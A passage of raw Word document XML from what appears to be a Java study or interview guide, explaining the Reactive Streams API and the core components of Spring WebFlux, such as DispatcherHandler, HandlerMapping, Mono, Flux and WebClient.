          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> defines a standard for asynchronous and non-blocking stream processing in Java, enabling the creation of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The API focuses on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that consumers of data are </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>not overwhelmed, providing a reliable way to process data in highly concurrent and event-driven applications. By using the Publisher, Subscriber, Subscription, and Processor interfaces, developers can build scalable and efficient reactive systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32408482"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D87BC85">
          <v:rect id="_x0000_i2279" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7028422B" w14:textId="05577F14"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495" w:name="_Toc196307975"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the core components of Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="495"/>
    </w:p>
    <w:p w14:paraId="12DBFD73" w14:textId="6D4ABD81" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B" w:rsidP="00BF46DF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Spring WebFlux is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that supports the development of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications. It is designed to work in environments where scalability and high concurrency are essential. The core components of Spring WebFlux are designed to provide an efficient, reactive programming model for building web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C96E1B2"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Here are the core components of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635D36FD" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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1. WebFlux DispatcherHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A137323"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DispatcherHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the central component of Spring WebFlux, responsible for dispatching HTTP requests to the appropriate handler method. It is similar to DispatcherServlet in </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but works in a non-blocking, asynchronous manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2734B66C"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It is responsible for handling the web requests by delegating to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMappings</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which find the appropriate controller or handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C470342"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HandlerAdapters</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to invoke the methods of the controllers and send back the responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B54D364" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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2. Handler Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403E8A0E"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HandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for mapping an HTTP request to an appropriate handler (i.e., controller method). In Spring WebFlux, the mapping is done asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A43160D"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There are different types of </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerMappings</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB1B7D5" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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RequestMappingHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for mapping URLs to handler methods in controller classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE62851" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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SimpleUrlHandlerMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for mapping a URL to a handler bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA57F45" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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3. Handler Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E105DB8"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HandlerAdapter</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to invoke a handler (controller method). In Spring WebFlux, handler adapters support both </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotated</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods (using @RequestMapping or @GetMapping, etc.) and custom handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E84C2A"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This component adapts the handler method to a model that can return a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive type</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are the main abstractions in reactive programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBEA573" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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4. Reactive HTTP Handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DDFD7B"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These are the actual controllers or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> responsible for handling the incoming requests. They can return </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from their methods. These handlers are reactive and non-blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951FCDA"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Handlers can be implemented using either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795DEE44" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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Controller classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (similar to Spring MVC controllers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AAAF4" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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Functional programming style</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RouterFunctions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerFunctions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as an alternative to annotations-based configuration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD1D0C" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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5. Reactive Programming Support (Mono and Flux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE016FF"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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the core types for working with reactive streams in Spring WebFlux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF12F8" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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Mono</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a single asynchronous value or an empty value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E7A84E" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B" w:rsidP="00BF46DF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> represents a stream of 0 to N asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D30AE0C"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These types enable handling asynchronous, non-blocking data streams and allow the application to respond to multiple concurrent requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91E9EA" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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6. WebClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC76A88"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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a non-blocking, reactive HTTP client used to perform HTTP requests asynchronously. It is part of Spring WebFlux and is designed for making reactive, asynchronous HTTP requests in client applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4EC9E8"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It provides an alternative to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RestTemplate</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can be used to interact with other services in a non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4B5B4" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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7. Router Functions (Functional Endpoints)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB8DDD"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RouterFunctions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HandlerFunctions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provide an alternative to the annotated controllers and allow you to define routes and their handlers programmatically in a more functional style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE1819"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They are useful in defining a more flexible routing structure where you can define HTTP method mappings using RouterFunction and handle requests with a corresponding HandlerFunction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4F557E" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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8. Exception Handling (WebExceptionHandler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F9785"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WebExceptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is responsible for handling exceptions that occur during the processing of a request. This is equivalent to the @ExceptionHandler mechanism in Spring MVC but adapted for the reactive world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB48D80"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It allows you to customize how exceptions are handled in a non-blocking and asynchronous manner, providing centralized error handling for the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA54C93" w14:textId="77777777" w:rsidR="00DD051B" w:rsidRPr="00BF46DF" w:rsidRDefault="00DD051B"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lastRenderedPageBreak/>
        <w:t>9. Filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77A4F3"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Filters</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF46DF">
